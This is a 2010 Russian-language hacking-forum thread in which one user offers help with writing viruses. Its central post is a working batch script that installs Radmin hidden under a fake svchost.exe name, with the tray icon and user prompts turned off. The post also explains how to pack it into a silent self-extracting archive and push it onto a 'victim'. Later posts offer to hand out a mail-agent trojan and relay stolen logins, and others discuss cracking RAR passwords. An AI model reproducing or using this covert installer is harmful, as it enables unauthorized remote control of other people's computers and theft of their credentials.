Сообщений в теме: 13

[MoRoZko]

В тебе обсудим:
кто чем страдал, что дошел до этого)
кто какую пакасть писал, у кого что работает что неработает)
если нужна помошь по вирусописанию или просто программописанию пишем суда поможем чем сможем как говориться)

Кто хочет пример может не читать

Как пример:
Я сам просто страдал тем чем страдает 90% свободново времени мужыки, да плюс агент "недоброжелателя хотел сильно узнать". Пакостей писал много и много ещё напишу, написать то можно всё просто фантазии не набираеться, помошь собственно мне тоже требуеться, ток в идеях, призываю народ на выложение всяких идей "умных" вирусов, программ от которых польза есть...
Пишу беспалевные умные вирусы, например Скрытый радмин который уже всеми антивирями палиться переписал под беспалевного, всякие разные грабберы(для тех кто незнает: пришёл всунул флешку, ушёл и чуть ли ни все пороли которые есть на компе с собой унёс на ней же, ток их увидишь токо ты), ну или "почти" грабберы, запустил "обычную" программку, а пороли ко мне на почту пришли, из полезностей писал сортировку файлов (музыку в папку музыку, картинки в папку картинки и т.д.) таймеры всякие, будильники)))) думаю многи люди заинтересуються... Сразу говорю "чистые вирусы" скидывать небуду, пишем сами я просто помогать буду хотя может и договоримся)))

Тему создаю только для того чтобы "хакеров самоучек, начинающих" ну и естественно "начинающих мелко программописателей" с ног поднять, поучить чемунить)

зы: сам хакером неявляюсь, поролей куча чужых на компе, но непользуюсь) я добрый)



незабываем также пишем полезные программы они на ровне идут по сложности)

Сообщение отредактировал MoRoZko: 15 Сентябрь 2010 - 20:14

[paranoid]

сорцы в студию.

[MoRoZko]

master_of_puppet (15.09.2010, 20:17) писал:

сорцы в студию.

хы хы
зы: кстате читы даже непросите небуду, нехочу и помогать с ними небуду)

[paranoid]

если в этой теме будут только понты, тогда от нее пользы 0.

[MoRoZko]

master_of_puppet (15.09.2010, 20:29) писал:

если в этой теме будут только понты, тогда от нее пользы 0.

да нафиг понты просто я по сообственному опыту знаю) пишишь чото неработает и начинешь по инету искать, проще то спросить чо в скрипте неработает, выложить то что сделал) лично я исправлю чем смогу помогу. а полезные программы выкладывать буду.

говорю вы мне идеи дайте я их в жизнь плавненько переведу) как наберёться поболее выложу)

у кого есть какие идеи???

[Victor.Z]

MoRoZko (15.09.2010, 20:42) писал:

да нафиг понты просто я по сообственному опыту знаю) пишишь чото неработает и начинешь по инету искать, проще то спросить чо в скрипте неработает, выложить то что сделал) лично я исправлю чем смогу помогу. а полезные программы выкладывать буду.

говорю вы мне идеи дайте я их в жизнь плавненько переведу) как наберёться поболее выложу)

у кого есть какие идеи???

Часто с Инета скачиваешь какую-нибудь прогу, она в Rar-овской папке, а начинаешь разархивировать, они сволочи просят SMS-ку отправить, для получения кода (естественно не бесплатно). Можно какой-нибудь программулинкой этот пароль взломать? Потому-что неизвестно сколько здерут за SMS-ку и не факт что пароль пришлют.

[yonga]

Victor.Z (2.10.2010, 12:31) писал:

Часто с Инета скачиваешь какую-нибудь прогу, она в Rar-овской папке, а начинаешь разархивировать, они сволочи просят SMS-ку отправить, для получения кода (естественно не бесплатно). Можно какой-нибудь программулинкой этот пароль взломать? Потому-что неизвестно сколько здерут за SMS-ку и не факт что пароль пришлют.

взломать можно , токо это долго и не эффективно
зависит от сложности пароля

[DenisMitchell]

Мой совет просто нужно скачать файл по другой ссылке.. когда требуют пароль для разархивации файла, это значит что файл был запакован через какуето партнёрскую программу.. На этом люди делают деньги и неплохие..
По поводу самой темы имеется вопрос: Есть ли на форуме человек который разбирается в системном и низкоуровневом программировании? Есть несколько вопросов...

[paranoid]

DenisMitchell (5.10.2010, 04:47) писал:

Мой совет просто нужно скачать файл по другой ссылке.. когда требуют пароль для разархивации файла, это значит что файл был запакован через какуето партнёрскую программу.. На этом люди делают деньги и неплохие..
По поводу самой темы имеется вопрос: Есть ли на форуме человек который разбирается в системном и низкоуровневом программировании? Есть несколько вопросов...

я чуть чуть занимался.

[DenisMitchell]

Уже разобрался со своей проблемой! Нужно было прогнать через отладчик один странно ведущий себя файл, как выяснилось это оказался кейлогер. Просто не мог понять куда отчёты летят, вопрос решился на раз два, просто отснифал все пакеты у себя и всё

[MoRoZko]

У вентуры появился вопрос на счёт скрытого радмина сейчас всё популярно всем обьясню

в инете вы рабочий врядтли найдёте так как файл регистра палиться антивирями, ну почти всеми

исправляем этот недуг вместо обычного reg.reg файла забиваем струкнуру его в бат файл откуда и видёться сама установка радмина
приблезительно вот так будет выглядеть:

Цитата

reg delete "HKEY_LOCAL_MACHINE\SYSTEM\RAdmin" /f
reg add HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server\Parameters /v LogFilePath /t REG_SZ /d c:\logfile.txt /f
reg add HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server\Parameters /v NTAuthEnabled /t REG_BINARY /d 00000000 /f
reg add HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server\Parameters /v Parameter /t REG_BINARY /d трулулу /f
reg add HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server\Parameters /v DisableTrayIcon /t REG_BINARY /d 01000000 /f
reg add HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server\Parameters /v Port /t REG_BINARY /d трулулу /f
reg add HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server\Parameters /v EnableLogFile /t REG_BINARY /d 00000000 /f
reg add HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server\Parameters /v FilterIp /t REG_BINARY /d 00000000 /f
reg add HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server\Parameters /v AskUser /t REG_BINARY /d 00000000 /f

терь обьяснение к веткам:
Parameter - пороль на радмин хоть он и храниться в зашифрованом виде я "трулулу" вставил
Port - на какой порт будет ставиться тоже трулулу вместо хэша
менять выше перечисленые параметры трудоёмко т.к. они зашифрованы

далее просто, но немение важно:
AskUser - спраишвать у юсера при конекте, т.к. радмин скрытый ставим неспрашивать
DisableTrayIcon - показывать иконку в трее, тоже нет

далее в батнике пишем куды будем копировать сорцы самого радмина, а иммено:
AdmDll.dll
raddrv.dll
svchost.exe зы: может называться как угодно у меня так
копируем это всё командой типо copy /y в %SYSTEMROOT%/help\
пример:

Цитата

copy /y "svchost.exe" "%SYSTEMROOT%/help\svchost.exe"
copy /y "raddrv.dll" "%SYSTEMROOT%/help\raddrv.dll"
copy /y "admdll.dll" "%SYSTEMROOT%/help\admdll.dll"

терь непосредственно устанавливаем сам радмин из уже всего готовенького:

Цитата

"%SYSTEMROOT%/help\svchost.exe" /install /silence

и запускаем

Цитата

"%SYSTEMROOT%/help\svchost.exe" /start

он сам прописываеться на автозагрузку, причём административную и обычному пользователю невидно
ещё нам нужен vbs скрипт для чего узнаете попойже
vbs:

Цитата

Set WshShell = WScript.CreateObject("WScript.Shell")
WshShell.Run ("наш_радмин.bat")

кстате наш_радмин.bat может быть и exe файлом, нужно всеголишь компилятор... и окошко батника мигать не будет перед глазами когда установка будет проходить

Впринцыпе разобрались с радмином терь как из 4х файлов сделать один, а очень легко)))
для этого нам потребуеться обычный архиватор WinRar который у всех есть надеюсь...
выбераем файлы и прописываем в коментарии что то в роде:

Цитата

Path=xak\
SavePath
Setup=st.vbs
Silent=1
Overwrite=1

переменые
Path - куды сейвим
Setup - что запускаем после распоковки, т.к. запуск bat файлов из архива заприщенно системой безопасности microsoft, пользуемся vbs который уже будет запускать bat файл ну или exe
Silent - не выдовать окон
Overwrite - перезаписывать все файлы без запроса

в исходе получаем 1 самораспоковывающийся архив с любым значком который нам понравиться, и при его запуске не будет происходить нечего, как будто нерабочий файл, ну или бат окошко мигать будет...(пользуйтесь компилятором!!!)
всё что осталось либо замоскировать его какнибуть и скинуть шобы скачали запустили
либо же тупо пихнуть его жертве
зы: работает токо при открытых портах, на инет у нас без hamachi или какойнить проги на подобе работать небудет! а у нас через vpn пользуйтесь скоко влезет!


в итоге у нас получаеться:

Цитата

@echo on

reg delete "HKEY_LOCAL_MACHINE\SYSTEM\RAdmin" /f

reg add HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server\Parameters /v LogFilePath /t REG_SZ /d c:\logfile.txt /f
reg add HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server\Parameters /v NTAuthEnabled /t REG_BINARY /d 00000000 /f
reg add HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server\Parameters /v Parameter /t REG_BINARY /d трулулу /f
reg add HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server\Parameters /v DisableTrayIcon /t REG_BINARY /d 01000000 /f
reg add HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server\Parameters /v Port /t REG_BINARY /d трулулу /f
reg add HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server\Parameters /v EnableLogFile /t REG_BINARY /d 00000000 /f
reg add HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server\Parameters /v FilterIp /t REG_BINARY /d 00000000 /f
reg add HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server\Parameters /v AskUser /t REG_BINARY /d 00000000 /f


copy /y "svchost.exe" "%SYSTEMROOT%/help\svchost.exe"
copy /y "raddrv.dll" "%SYSTEMROOT%/help\raddrv.dll"
copy /y "admdll.dll" "%SYSTEMROOT%/help\admdll.dll"
"%SYSTEMROOT%/help\svchost.exe" /install /silence
"%SYSTEMROOT%/help\svchost.exe" /start

кому помог или просто понравилось))) НЕ ЗАБЫВАЙТЕ ТЫКАТЬ СПАСИБО!!!

Сообщение отредактировал MoRoZko: 10 Октябрь 2010 - 19:13

[MoRoZko]

Victor.Z (2.10.2010, 14:31) писал:

Часто с Инета скачиваешь какую-нибудь прогу, она в Rar-овской папке, а начинаешь разархивировать, они сволочи просят SMS-ку отправить, для получения кода (естественно не бесплатно). Можно какой-нибудь программулинкой этот пароль взломать? Потому-что неизвестно сколько здерут за SMS-ку и не факт что пароль пришлют.

кстате

Ventura (2.10.2010, 14:36) писал:

взломать можно , токо это долго и не эффективно
зависит от сложности пароля

обычный брут в среднем 4-6часов на взлом 8и значного пороля(зависит от мощьности компа)
или алгоритм влома ищи в гугле) если найдёшь на взлом самого архива уйдёт не больше 5ти минут

и ещё как вариант, с какого сайта качаешь такой и пороль...
допустим на antichatе на все архивы пороль antichat или antichat.ru

DenisMitchell (5.10.2010, 05:47) писал:

Мой совет просто нужно скачать файл по другой ссылке.. когда требуют пароль для разархивации файла, это значит что файл был запакован через какуето партнёрскую программу.. На этом люди делают деньги и неплохие..
По поводу самой темы имеется вопрос: Есть ли на форуме человек который разбирается в системном и низкоуровневом программировании? Есть несколько вопросов...

я в программировании шарю болемение обращайся

Сообщение отредактировал MoRoZko: 10 Октябрь 2010 - 19:23

[MoRoZko]

счас пойду погуляю и напишу взлом майл агента, тип троя, ток сорцы выкладывать небуду просто напишу чо откуда взять и как это потом ипользовать)))

зы: кому надо пишите ПМ скину вирь, вы его торжественно вручите жертве под какимнить предлогом а потом я вам скинун логин пасс уже с моей почты вам в личку)))

Сообщение отредактировал MoRoZko: 10 Октябрь 2010 - 19:21

[PARADOX]

MoRoZko (10.10.2010, 19:20) писал:

зы: кому надо пишите ПМ скину вирь, вы его торжественно вручите жертве под какимнить предлогом а потом я вам скинун логин пасс уже с моей почты вам в личку)))

Да зачем писать тебе, давай лучше встретимся и ты сам при встрече все расскажешь.
Я тебе писал, ты не ответил.